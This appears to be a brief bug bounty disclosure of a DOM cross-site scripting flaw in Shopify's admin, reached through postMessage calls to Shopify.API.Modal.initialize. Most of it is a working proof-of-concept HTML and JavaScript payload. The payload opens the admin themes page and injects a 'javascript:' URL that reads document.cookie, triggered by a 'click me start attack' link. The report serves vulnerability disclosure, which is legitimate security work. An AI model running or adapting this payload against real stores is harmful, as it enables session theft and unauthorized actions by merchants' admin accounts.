DOM XSS via Shopify.API.Modal.initialize

Similar #422043 & #576532 Payload ( Based on #576532): ```html <script> function attack(){ const ctx = window.open(location.origin+'/admin/themes', '_blank') const json = { message: "Shopify.API.Modal.initialize", data: { src: "" } } let interval; interval = setInterval(function(){ if (window.attackSuccess) { clearInterval(interval) } else { ctx.postMessage(JSON.stringify(json)) // data.src == "" json.data.src = "javascript:alert(document.cookie)" ctx.postMessage(JSON.stringify(json)) } }, 500) } attack() </script> <a href="javascript:attack()" style="display:block;text-align:center;width:100%;height:300px;line-height:300px;background:#000;color:#fff;">click me start attack</a> ``` ## Impact Perform unauthorized actions on a store admin on any embedded apps.